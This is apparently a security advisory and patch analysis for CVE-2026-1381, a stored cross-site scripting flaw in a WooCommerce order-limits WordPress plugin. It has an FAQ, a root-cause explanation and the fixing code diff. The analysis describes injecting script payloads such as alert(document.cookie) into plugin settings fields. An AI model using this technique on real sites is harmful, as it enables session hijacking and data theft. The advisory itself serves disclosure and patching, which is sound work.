What is CVE-2026-1381?

CVE-2026-1381 is a stored cross-site scripting (XSS) vulnerability in the Order Minimum/Maximum Amount Limits for WooCommerce plugin for WordPress. It allows authenticated users with Shop Manager permissions or higher to inject arbitrary JavaScript into WooCommerce product pages, which can execute when other users view those pages.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and output escaping in the plugin’s settings. Attackers can inject malicious scripts into specific configuration fields, which are then stored in the WordPress database and executed when users access affected product pages.

Who is affected by this vulnerability?

Any WordPress installations using the Order Minimum/Maximum Amount Limits for WooCommerce plugin version 4.6.8 or earlier are affected. This primarily impacts multi-site installations or those where the unfiltered_html capability is disabled, as only authenticated users with Shop Manager permissions can exploit the vulnerability.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Order Minimum/Maximum Amount Limits for WooCommerce plugin installed. If it is version 4.6.8 or earlier, your site is at risk. Additionally, review the plugin settings for any unauthorized changes or script injections.

What should I do to fix this issue?

The vulnerability has been patched in version 4.6.9 of the plugin. To mitigate the issue, update the plugin to the latest version immediately. Regularly check for updates to ensure ongoing protection against vulnerabilities.

What does the CVSS score of 4.4 indicate?

A CVSS score of 4.4 indicates a medium severity level for this vulnerability. This means that while the risk is not critical, it is significant enough to warrant immediate attention, especially in environments where user data and security are priorities.

What are the practical risks associated with this vulnerability?

Exploitation of this vulnerability can lead to various security risks, including session hijacking, data theft, or redirecting users to malicious sites. Attackers could gain access to sensitive information such as authentication cookies or payment details, posing a significant threat to users.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can log into a vulnerable WordPress site and inject a JavaScript payload into the plugin settings. This script demonstrates the stored XSS attack by executing an alert when the modified content is viewed by other users, highlighting the vulnerability’s impact.

What is the role of wp_kses_post() in the patch?

The wp_kses_post() function is used in the patch to sanitize output by allowing only a limited set of HTML tags and attributes. This effectively prevents JavaScript injection while still permitting safe HTML formatting, thus mitigating the risk of XSS attacks.

How can I further secure my WordPress site?

To enhance the security of your WordPress site, regularly update all plugins and themes, use strong passwords, implement two-factor authentication, and limit user permissions. Additionally, consider using security plugins that monitor for vulnerabilities and provide firewall protection.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the affected plugin until a patch can be applied. Additionally, review user permissions to limit access to the plugin settings, and monitor for any suspicious activity on your site.

Where can I find more information about this vulnerability?

Further information about CVE-2026-1381 can be found on the official CVE database, security blogs, and the WordPress plugin repository. Keeping abreast of security advisories and updates from trusted sources is essential for maintaining site security.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-1381: Order Minimum/Maximum Amount Limits for WooCommerce <= 4.6.8 – Authenticated (Shop Manager+) Stored Cross-Site Scripting via Hide Add to Cart Content Fields (order-minimum-amount-for-woocommerce)

CVE ID CVE-2026-1381

Plugin order-minimum-amount-for-woocommerce

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 4.6.8

Patched Version 4.6.9

Disclosed January 26, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-1381:
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Order Minimum/Maximum Amount Limits for WooCommerce WordPress plugin. The vulnerability affects plugin versions up to and including 4.6.8. It allows attackers with Shop Manager or higher permissions to inject arbitrary JavaScript that executes when users view affected WooCommerce product pages. The vulnerability only impacts multi-site WordPress installations or installations where the unfiltered_html capability is disabled.

The root cause is insufficient output escaping in three functions within the class-alg-wc-oma-core.php file. The hide_add_to_cart_single function at line 337 directly echoes user-controlled content from the alg_wc_oma_max_hide_add_to_cart_single_content option without sanitization. The add_variation_data_regarding_add_to_cart_single function at line 395 assigns the same unsanitized option value to a data array. The hide_add_to_cart_loop function at line 419 stores unsanitized content from the max_hide_add_to_cart_loop_content property in a product cache. All three code paths retrieve content from plugin settings that Shop Manager users can modify through the WordPress admin interface.

Exploitation requires an authenticated attacker with Shop Manager permissions or higher. The attacker would navigate to the plugin’s settings page in the WordPress admin area, specifically to the Hide Add to Cart Content configuration fields. These fields accept HTML content that displays when order minimum/maximum amount conditions are met. The attacker would inject JavaScript payloads into these fields, such as alert(document.cookie) or more sophisticated malicious scripts. The injected content persists in the WordPress database and executes whenever a user views a product page where the plugin’s hide add-to-cart logic triggers.

The patch in version 4.6.9 adds wp_kses_post() output escaping to all three vulnerable code locations. At line 337, the patch changes echo get_option(…) to echo wp_kses_post(get_option(…)). At line 395, it changes the assignment to wp_kses_post(get_option(…)). At line 419, it changes the cache assignment to wp_kses_post($this->max_hide_add_to_cart_loop_content). The wp_kses_post function filters content for allowed HTML tags and attributes according to the post context, effectively neutralizing JavaScript injection while preserving legitimate HTML formatting.

Successful exploitation enables stored XSS attacks that execute in the context of any user viewing affected product pages. This can lead to session hijacking, administrative account takeover, defacement, or redirection to malicious sites. Attackers could steal sensitive data including authentication cookies, payment information, or personal user data. The vulnerability requires Shop Manager privileges, which limits immediate exploitation to trusted users, but could enable privilege escalation if combined with other vulnerabilities or social engineering.

Differential between vulnerable and patched code

Code Diff

--- a/order-minimum-amount-for-woocommerce/includes/class-alg-wc-oma-core.php
+++ b/order-minimum-amount-for-woocommerce/includes/class-alg-wc-oma-core.php
@@ -2,7 +2,7 @@
 /**
  * Order Minimum Amount for WooCommerce - Core Class.
  *
- * @version 4.6.0
+ * @version 4.6.9
  * @since   1.0.0
  *
  * @author  WPFactory
@@ -321,7 +321,7 @@
 		/**
 		 * hide_add_to_cart_single.
 		 *
-		 * @version 4.2.0
+		 * @version 4.6.9
 		 * @since   3.4.0
 		 *
 		 * @todo    variable: disable on per variation basis?
@@ -337,7 +337,7 @@
 				'product'       => $product,
 			) ) ) {
 				remove_action( 'woocommerce_single_product_summary', 'woocommerce_template_single_add_to_cart', 30 );
-				echo get_option( 'alg_wc_oma_max_hide_add_to_cart_single_content', '' );
+				echo wp_kses_post( get_option( 'alg_wc_oma_max_hide_add_to_cart_single_content', '' ) );
 			}
 		}

@@ -378,7 +378,7 @@
 		/**
 		 * add_variation_data_regarding_add_to_cart_single.
 		 *
-		 * @version 4.2.0
+		 * @version 4.6.9
 		 * @since   4.2.0
 		 *
 		 * @param $data
@@ -395,7 +395,7 @@
 				'is_simplified' => true,
 				'product'       => $variation,
 			) ) ) {
-				$data['alg_wc_oma_hide_add_to_cart_btn_content'] = get_option( 'alg_wc_oma_max_hide_add_to_cart_single_content', '' );
+				$data['alg_wc_oma_hide_add_to_cart_btn_content'] = wp_kses_post( get_option( 'alg_wc_oma_max_hide_add_to_cart_single_content', '' ) );
 			}
 			return $data;
 		}
@@ -403,7 +403,7 @@
 		/**
 		 * hide_add_to_cart_loop.
 		 *
-		 * @version 4.2.0
+		 * @version 4.6.9
 		 * @since   3.4.0
 		 */
 		function hide_add_to_cart_loop( $link, $product, $args ) {
@@ -419,7 +419,7 @@
 						'is_simplified' => true,
 						'product'       => $product,
 					) ) ) {
-						$this->product_cache['hide_add_to_cart_loop'][ $product_id ] = $this->max_hide_add_to_cart_loop_content;
+						$this->product_cache['hide_add_to_cart_loop'][ $product_id ] = wp_kses_post( $this->max_hide_add_to_cart_loop_content );
 					}
 				}
 				return $this->product_cache['hide_add_to_cart_loop'][ $product_id ];
--- a/order-minimum-amount-for-woocommerce/order-minimum-amount-for-woocommerce.php
+++ b/order-minimum-amount-for-woocommerce/order-minimum-amount-for-woocommerce.php
@@ -3,12 +3,12 @@
 Plugin Name: Order Minimum/Maximum Amount Limits for WooCommerce
 Plugin URI: https://wpfactory.com/item/order-minimum-maximum-amount-for-woocommerce/
 Description: Set required minimum and/or maximum order amounts (e.g. sum, quantity, weight, volume, etc.) in WooCommerce.
-Version: 4.6.8
+Version: 4.6.9
 Author: WPFactory
 Author URI: https://wpfactory.com
 Text Domain: order-minimum-amount-for-woocommerce
 Domain Path: /langs
-WC tested up to: 10.2
+WC tested up to: 10.4
 Requires Plugins: woocommerce
 License: GNU General Public License v3.0
 License URI: http://www.gnu.org/licenses/gpl-3.0.html
@@ -72,7 +72,7 @@
 		 * @since 1.0.0
 		 * @var   string
 		 */
-		public $version = '4.6.8';
+		public $version = '4.6.9';

 		/**
 		 * $_instance.
--- a/order-minimum-amount-for-woocommerce/vendor/composer/autoload_classmap.php
+++ b/order-minimum-amount-for-woocommerce/vendor/composer/autoload_classmap.php
@@ -23,6 +23,7 @@
     'PHPCSUtils\Exceptions\UnexpectedTokenType' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Exceptions/UnexpectedTokenType.php',
     'PHPCSUtils\Exceptions\ValueError' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Exceptions/ValueError.php',
     'PHPCSUtils\Fixers\SpacesFixer' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Fixers/SpacesFixer.php',
+    'PHPCSUtils\Internal\AttributeHelper' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/AttributeHelper.php',
     'PHPCSUtils\Internal\Cache' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/Cache.php',
     'PHPCSUtils\Internal\IsShortArrayOrList' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/IsShortArrayOrList.php',
     'PHPCSUtils\Internal\IsShortArrayOrListWithCache' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/IsShortArrayOrListWithCache.php',
@@ -34,6 +35,7 @@
     'PHPCSUtils\Tokens\Collections' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Tokens/Collections.php',
     'PHPCSUtils\Tokens\TokenHelper' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Tokens/TokenHelper.php',
     'PHPCSUtils\Utils\Arrays' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Arrays.php',
+    'PHPCSUtils\Utils\AttributeBlock' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/AttributeBlock.php',
     'PHPCSUtils\Utils\Conditions' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Conditions.php',
     'PHPCSUtils\Utils\Constants' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Constants.php',
     'PHPCSUtils\Utils\Context' => $vendorDir . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Context.php',
--- a/order-minimum-amount-for-woocommerce/vendor/composer/autoload_static.php
+++ b/order-minimum-amount-for-woocommerce/vendor/composer/autoload_static.php
@@ -42,6 +42,7 @@
         'PHPCSUtils\Exceptions\UnexpectedTokenType' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Exceptions/UnexpectedTokenType.php',
         'PHPCSUtils\Exceptions\ValueError' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Exceptions/ValueError.php',
         'PHPCSUtils\Fixers\SpacesFixer' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Fixers/SpacesFixer.php',
+        'PHPCSUtils\Internal\AttributeHelper' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/AttributeHelper.php',
         'PHPCSUtils\Internal\Cache' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/Cache.php',
         'PHPCSUtils\Internal\IsShortArrayOrList' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/IsShortArrayOrList.php',
         'PHPCSUtils\Internal\IsShortArrayOrListWithCache' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Internal/IsShortArrayOrListWithCache.php',
@@ -53,6 +54,7 @@
         'PHPCSUtils\Tokens\Collections' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Tokens/Collections.php',
         'PHPCSUtils\Tokens\TokenHelper' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Tokens/TokenHelper.php',
         'PHPCSUtils\Utils\Arrays' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Arrays.php',
+        'PHPCSUtils\Utils\AttributeBlock' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/AttributeBlock.php',
         'PHPCSUtils\Utils\Conditions' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Conditions.php',
         'PHPCSUtils\Utils\Constants' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Constants.php',
         'PHPCSUtils\Utils\Context' => __DIR__ . '/..' . '/phpcsstandards/phpcsutils/PHPCSUtils/Utils/Context.php',
--- a/order-minimum-amount-for-woocommerce/vendor/composer/installed.php
+++ b/order-minimum-amount-for-woocommerce/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => '__root__',
         'pretty_version' => 'dev-master',
         'version' => 'dev-master',
-        'reference' => 'ab424214f530c0e503de9dfeaf4d7e23ae9bf0ea',
+        'reference' => '8609153422f2ded9278977f55e6a4b4700b82b3a',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,52 +13,52 @@
         '__root__' => array(
             'pretty_version' => 'dev-master',
             'version' => 'dev-master',
-            'reference' => 'ab424214f530c0e503de9dfeaf4d7e23ae9bf0ea',
+            'reference' => '8609153422f2ded9278977f55e6a4b4700b82b3a',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),
             'dev_requirement' => false,
         ),
         'dealerdirect/phpcodesniffer-composer-installer' => array(
-            'pretty_version' => 'v1.1.2',
-            'version' => '1.1.2.0',
-            'reference' => 'e9cf5e4bbf7eeaf9ef5db34938942602838fc2b1',
+            'pretty_version' => 'v1.2.0',
+            'version' => '1.2.0.0',
+            'reference' => '845eb62303d2ca9b289ef216356568ccc075ffd1',
             'type' => 'composer-plugin',
             'install_path' => __DIR__ . '/../dealerdirect/phpcodesniffer-composer-installer',
             'aliases' => array(),
             'dev_requirement' => true,
         ),
         'phpcsstandards/phpcsextra' => array(
-            'pretty_version' => '1.4.1',
-            'version' => '1.4.1.0',
-            'reference' => '882b8c947ada27eb002870fe77fee9ce0a454cdb',
+            'pretty_version' => '1.5.0',
+            'version' => '1.5.0.0',
+            'reference' => 'b598aa890815b8df16363271b659d73280129101',
             'type' => 'phpcodesniffer-standard',
             'install_path' => __DIR__ . '/../phpcsstandards/phpcsextra',
             'aliases' => array(),
             'dev_requirement' => true,
         ),
         'phpcsstandards/phpcsutils' => array(
-            'pretty_version' => '1.1.2',
-            'version' => '1.1.2.0',
-            'reference' => 'b22b59e3d9ec8fe4953e42c7d59117c6eae70eae',
+            'pretty_version' => '1.2.2',
+            'version' => '1.2.2.0',
+            'reference' => 'c216317e96c8b3f5932808f9b0f1f7a14e3bbf55',
             'type' => 'phpcodesniffer-standard',
             'install_path' => __DIR__ . '/../phpcsstandards/phpcsutils',
             'aliases' => array(),
             'dev_requirement' => true,
         ),
         'squizlabs/php_codesniffer' => array(
-            'pretty_version' => '3.13.4',
-            'version' => '3.13.4.0',
-            'reference' => 'ad545ea9c1b7d270ce0fc9cbfb884161cd706119',
+            'pretty_version' => '3.13.5',
+            'version' => '3.13.5.0',
+            'reference' => '0ca86845ce43291e8f5692c7356fccf3bcf02bf4',
             'type' => 'library',
             'install_path' => __DIR__ . '/../squizlabs/php_codesniffer',
             'aliases' => array(),
             'dev_requirement' => true,
         ),
         'wp-coding-standards/wpcs' => array(
-            'pretty_version' => '3.2.0',
-            'version' => '3.2.0.0',
-            'reference' => 'd2421de7cec3274ae622c22c744de9a62c7925af',
+            'pretty_version' => '3.3.0',
+            'version' => '3.3.0.0',
+            'reference' => '7795ec6fa05663d716a549d0b44e47ffc8b0d4a6',
             'type' => 'phpcodesniffer-standard',
             'install_path' => __DIR__ . '/../wp-coding-standards/wpcs',
             'aliases' => array(),
@@ -74,9 +74,9 @@
             'dev_requirement' => false,
         ),
         'wpfactory/wpfactory-cross-selling' => array(
-            'pretty_version' => 'v1.0.6',
-            'version' => '1.0.6.0',
-            'reference' => 'a371556ebb9bdadc8e5aa0f19bf7ecb5c69636c5',
+            'pretty_version' => 'v1.0.9',
+            'version' => '1.0.9.0',
+            'reference' => '8bd6caf3de67eeff5164a7a9a8cfd5c01c472a06',
             'type' => 'library',
             'install_path' => __DIR__ . '/../wpfactory/wpfactory-cross-selling',
             'aliases' => array(),
--- a/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-banners.php
+++ b/order-minimum-amount-for-woocommerce/vendor/wpfactory/wpfactory-cross-selling/src/php/class-banners.php
@@ -1,14 +1,16 @@
 <?php
 /**
- * WPFactory Cross-Selling - Products
+ * WPFactory Cross-Selling - Banners
  *
- * @version 1.0.4
- * @since   1.0.4
+ * @version 1.0.8
+ * @since   1.0.7
  * @author  WPFactory
  */

 namespace WPFactoryWPFactory_Cross_Selling;

+use WPFactoryWPFactory_Admin_MenuWPFactory_Admin_Menu;
+
 if ( ! defined( 'ABSPATH' ) ) {
 	exit;
 } // Exit if accessed directly
@@ -18,45 +20,446 @@
 	/**
 	 * Banners.
 	 *
-	 * @version 1.0.4
-	 * @since   1.0.4
+	 * @version 1.0.7
+	 * @since   1.0.7
 	 */
 	class Banners {

 		/**
 		 * WPFactory_Cross_Selling_Injector.
 		 *
-		 * @since 1.0.4
+		 * @since 1.0.7
 		 */
 		use WPFactory_Cross_Selling_Injector;

 		/**
-		 * Products.
+		 * Initialized.
 		 *
-		 * @since   1.0.4
+		 * @since   1.0.7
 		 *
-		 * @var array
+		 * @var bool
 		 */
-		protected $banners = array();
+		protected static $initialized = false;
+
+		/**
+		 * $get_dashboard_banner_ajax_action.
+		 *
+		 * @since   1.0.7
+		 *
+		 * @var string
+		 */
+		protected $get_dashboard_banner_ajax_action = 'wpfcs_get_dashboard_banner';
+
+		/**
+		 * $close_dashboard_banner_ajax_action.
+		 *
+		 * @since   1.0.7
+		 *
+		 * @var string
+		 */
+		protected $close_dashboard_banner_ajax_action = 'wpfcs_close_dashboard_banner';
+
+		/**
+		 * Initializes the class.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return void
+		 */
+		function init() {
+			$setup_args = $this->get_wpfactory_cross_selling()->get_setup_args();
+			if (
+				$setup_args['banners']['enable'] &&
+				! self::$initialized
+			) {
+				self::$initialized = true;
+				add_action( 'admin_enqueue_scripts', array( $this, 'enqueue_dynamic_style' ), 11 );
+				add_filter( 'wpfcs_enqueue_admin_css', array( $this, 'enqueue_cross_selling_admin_css' ) );
+				add_action( 'admin_notices', array( $this, 'display_dashboard_banner_wrapper' ) );
+				add_action( 'wp_ajax_' . $this->get_dashboard_banner_ajax_action, array( $this, 'get_dashboard_banner_ajax_action' ) );
+				add_action( 'wp_ajax_' . $this->close_dashboard_banner_ajax_action, array( $this, 'close_dashboard_banner_ajax_action' ) );
+			}
+		}
+
+		/**
+		 * enqueue_dynamic_style.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return void
+		 */
+		function enqueue_dynamic_style() {
+			if (
+				$this->can_display_banner_at_current_location() &&
+				! $this->dashboard_banner_should_remain_closed()
+			) {
+				$close_btn_right_or_left = true === is_rtl() ? 'left' : 'right';
+				$right_or_left_style     = $close_btn_right_or_left . ': -12px;';
+				$css                     = "
+				.wpfcs-dashboard-banner-close-btn {
+					{$right_or_left_style};
+				}
+			";
+				wp_add_inline_style( 'wpfactory-cross-selling', $css );
+			}
+		}
+
+		/**
+		 * enqueue_cross_selling_admin_css.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @param $enqueue
+		 *
+		 * @return true
+		 */
+		function enqueue_cross_selling_admin_css( $enqueue ) {
+			if (
+				$this->can_display_banner_at_current_location() &&
+				! $this->dashboard_banner_should_remain_closed()
+			) {
+				$enqueue = true;
+			}
+
+			return $enqueue;
+		}
+
+		/**
+		 * get_advanced_ads_group.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return mixed|void|null
+		 */
+		function get_advanced_ads_group( $group_name ) {
+			$response = wp_remote_get( 'https://wpfactory.com/wp-json/advanced-ads/v1/groups' );
+			if ( ! is_wp_error( $response ) ) {
+				$body   = wp_remote_retrieve_body( $response );
+				$data   = json_decode( $body, true );
+				$result = wp_list_filter( $data, [
+					'name' => $group_name
+				] );
+				if ( empty( $result ) ) {
+					return null;
+				}
+
+				return array_shift( $result );
+			}
+
+			return null;
+		}
+
+		/**
+		 * get_banners_from_advanced_ads_group.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return mixed|void
+		 */
+		function get_banners_from_advanced_ads_group( $advaced_ads_group ) {
+			$setup_args = $this->get_wpfactory_cross_selling()->get_setup_args();
+			$content    = array();
+
+			$advaced_ads_group_sanitized = sanitize_key( $advaced_ads_group );
+			$transient_name              = "wpfcs_banners_from_advanced_ads_group_{$advaced_ads_group_sanitized}";
+
+			if ( 'advanced_ads' === $setup_args['banners']['get_banner_method'] ) {
+				if ( false !== $setup_args['banners']['banner_cache_duration'] && false !== ( $cached_content = get_transient( $transient_name ) ) ) {
+					return $cached_content;
+				}
+				$group = $this->get_advanced_ads_group( $advaced_ads_group );
+				if ( ! is_null( $group ) && isset( $group['ads'] ) ) {
+					if ( ! empty( $ads = $group['ads'] ) && is_array( $ads ) ) {
+						foreach ( $ads as $ad_id ) {
+							$response = wp_remote_get( 'https://wpfactory.com/wp-json/advanced-ads/v1/ads/' . $ad_id );
+
+							if ( ! is_wp_error( $response ) ) {
+								$body = wp_remote_retrieve_body( $response );
+								$data = json_decode( $body, true );
+								if ( isset( $data['expiration_date'] ) && ! empty( $expiration_date = $data['expiration_date'] ) ) {
+									if ( $expiration_date < current_time( 'timestamp' ) ) {
+										continue;
+									}
+								}
+								if ( isset( $data['content'] ) && ! empty( $data['content'] ) ) {
+									$content[] = $data['content'];
+								}
+							}
+						}
+					}
+
+					if ( false !== $setup_args['banners']['banner_cache_duration'] ) {
+						set_transient( $transient_name, $content, $setup_args['banners']['banner_cache_duration'] );
+					}
+
+					return $content;
+				}
+			}
+
+			return null;
+		}
+
+		/**
+		 * display_dashboard_banner.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return void
+		 */
+		function display_dashboard_banner_wrapper() {
+			if (
+				! $this->can_display_banner_at_current_location() ||
+				$this->dashboard_banner_should_remain_closed()
+			) {
+				return;
+			}
+			$banner = '<div class="wpfcs-dashboard-banner-wrapper"></div>';
+			echo wp_kses_post( $banner );
+			echo $this->get_dashboard_banner_js();
+		}
+
+		/**
+		 * get_dashboard_banner_ajax_action.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return void
+		 */
+		function get_dashboard_banner_ajax_action() {
+			if ( false !== check_ajax_referer( 'wpfcs-get-dashboard-banner', 'banner_nonce' ) ) {
+				$setup_args = $this->get_wpfactory_cross_selling()->get_setup_args();
+				$banners    = $this->get_banners_from_advanced_ads_group( $setup_args['banners']['advanced_ads_setup']['dashboard_banner_group_name'] );
+				if ( ! is_null( $banners ) ) {
+					if ( isset( $_REQUEST['is_recommendations_page'] ) && true === filter_var( $_REQUEST['is_recommendations_page'], FILTER_VALIDATE_BOOLEAN ) ) {
+						$output = $this->render_dashboard_banner( $banners, false );
+					} else {
+						$output = $this->dashboard_banner_should_remain_closed() ? '' : $this->render_dashboard_banner( $banners );
+					}
+				} else {
+					$output = '';
+				}
+				wp_send_json_success( array(
+					'banner_data' => wp_kses_post( $output ),
+				) );
+			}
+		}
+
+		/**
+		 * render_dashboard_banner.
+		 *
+		 * @version 1.0.8
+		 * @since   1.0.7
+		 *
+		 * @param $banners_arr
+		 *
+		 * @return string
+		 */
+		function render_dashboard_banner( $banners_arr, $add_close_button = true ) {
+			$banners_html = '';
+			if ( ! empty( $banners_arr ) ) {
+				$banners_html .= '<div class="wrap">';
+				foreach ( $banners_arr as $banner ) {
+					$close_button = $add_close_button ? '<button type="button" aria-label="' . __( 'Close', 'wpfactory-cross-selling' ) . '" class="wpfcs-dashboard-banner-close-btn"><div class="dashicons-before dashicons-no"></div></button>' : '';
+					$banners_html .= '<div class="wpfcs-dashboard-banner"><div class="wpfcs-dashboard-banner-inner">' . wp_kses_post( $this->force_target_blank_on_html( $banner ) ) . $close_button . '</div></div>';
+					break;
+				}
+				$banners_html .= '</div>';
+			}
+
+			return $banners_html;
+		}
+
+		/**
+		 * dashboard_banner_should_remain_closed.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return bool
+		 */
+		function dashboard_banner_should_remain_closed() {
+			if ( $this->is_recommendations_page() ) {
+				return false;
+			}
+
+			$user_id    = get_current_user_id();
+			$setup_args = $this->get_wpfactory_cross_selling()->get_setup_args();
+
+			if ( ! $user_id ) {
+				return false;
+			}
+
+			$closed_at = (int) get_user_meta( $user_id, 'wpfcs_dashboard_banner_closed_time', true );
+
+			if ( ! $closed_at ) {
+				return false;
+			}
+
+			return ( time() - $closed_at ) < $setup_args['banners']['banner_dismiss_duration'];
+		}
+
+		/**
+		 * close_dashboard_banner_ajax_action.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return void
+		 */
+		function close_dashboard_banner_ajax_action() {
+			if ( false !== check_ajax_referer( 'wpfcs-get-dashboard-banner', 'banner_nonce' ) ) {
+				update_user_meta( get_current_user_id(), 'wpfcs_dashboard_banner_closed_time', time() );
+				wp_send_json_success();
+			}
+		}
+
+		/**
+		 * can_display_banner_at_this_location.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return false|void
+		 */
+		function can_display_banner_at_current_location() {
+			return true;
+		}
+
+		/**
+		 * is_recommendations_page.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return bool
+		 */
+		function is_recommendations_page() {
+			return is_admin() && filter_input( INPUT_GET, 'page' ) === 'wpfactory-cross-selling';
+		}
+
+		/**
+		 * get_dashboard_banner_js.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @return false|string
+		 */
+		function get_dashboard_banner_js() {
+			ob_start();
+			$php_to_js = array(
+				'banner_nonce'            => wp_create_nonce( 'wpfcs-get-dashboard-banner' ),
+				'get_banner_action'       => $this->get_dashboard_banner_ajax_action,
+				'close_banner_action'     => $this->close_dashboard_banner_ajax_action,
+				'banner_wrapper_selector' => '.wpfcs-dashboard-banner-wrapper',
+				'close_button_selector'   => '.wpfcs-dashboard-banner-close-btn',
+				'is_recommendations_page' => $this->is_recommendations_page()
+			);
+			?>
+			<script>
+				// Gets banner.
+				jQuery( function ( $ ) {
+					let dataFromPHP = <?php echo wp_json_encode( $php_to_js );?>;
+					dataFromPHP.action = dataFromPHP.get_banner_action;
+					$.post( ajaxurl, dataFromPHP ).done( res => {
+						if ( res.data.banner_data?.trim() ) {
+							jQuery( dataFromPHP.banner_wrapper_selector ).html( res.data.banner_data )
+						}
+					} );
+				} );
+
+				// Closes banner.
+				jQuery( function ( $ ) {
+					let dataFromPHP = <?php echo wp_json_encode( $php_to_js );?>;
+					dataFromPHP.action = dataFromPHP.close_banner_action;
+					$( document ).on( 'click', dataFromPHP.close_button_selector, function () {
+						$( dataFromPHP.banner_wrapper_selector ).fadeOut( 300, function () {
+							$( this ).remove();
+						} );
+						$.post( ajaxurl, dataFromPHP );
+					} );
+				} );
+			</script>
+			<?php
+			return ob_get_clean();
+		}

 		/**
 		 * get_products.
 		 *
-		 * @version 1.0.4
-		 * @since   1.0.4
+		 * @version 1.0.7
+		 * @since   1.0.7
 		 *
 		 * @return array[]
 		 */
-		function get_banners() {
-			$this->banners = array(
-				array(
-					'url'     => 'https://wpfactory.com/item/all-plugin-access/?utm_source=plugin&utm_medium=cross-selling&utm_campaign=wpfactory',
-					'target'  => '_blank',
-					'img_src' => plugins_url( 'assets/img/lifetime-access-banner.png', $this->get_wpfactory_cross_selling()->get_setup_args()['library_root_path'] ),
-				),
-			);
+		function get_recommendation_tab_banners() {
+			$setup_args = $this->get_wpfactory_cross_selling()->get_setup_args();
+			$banners    = $this->get_banners_from_advanced_ads_group( $setup_args['banners']['advanced_ads_setup']['recommendations_group_name'] );
+
+			return $banners;
+		}
+
+		/**
+		 * render_recommendation_tab_banners.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @param $banners
+		 *
+		 * @return false|string
+		 */
+		function render_recommendation_tab_banners( $banners ) {
+			if ( empty( $banners ) || ! is_array( $banners ) ) {
+				return '';
+			}
+			ob_start();
+			?>
+			<?php foreach ( $banners as $banner ): ?>
+				<div class="wpfcs-banner">
+					<?php echo wp_kses_post( $this->force_target_blank_on_html( $banner ) ); ?>
+				</div>
+			<?php endforeach; ?>
+			<?php
+			$output = ob_get_contents();
+			ob_end_clean();
+
+			return $output;
+		}
+
+		/**
+		 * force_target_blank_on_html.
+		 *
+		 * @version 1.0.7
+		 * @since   1.0.7
+		 *
+		 * @param $raw_string
+		 *
+		 * @return false|string
+		 */
+		function force_target_blank_on_html( $raw_string ) {
+			$html = html_entity_decode( $raw_string, ENT_QUOTES, 'UTF-8' );
+			libxml_use_internal_errors( true );

-			return $this->banners;
+			$dom = new DOMDocument();
+			$dom->loadHTML( $html, LIBXML_HTML_NOIMPLIED | LIBXML_HTML_NODEFDTD );
+
+			foreach ( $dom->getElementsByTagName( 'a' ) as $a ) {
+				$a->setAttribute( 'target', '_blank' );
+				$a->setAttribute( 'rel', 'noopener noreferrer' );
+			}
+
+			$html = $dom->saveHTML();
+
+			return $html;
 		}
+
 	}
 }
 No newline at end of file
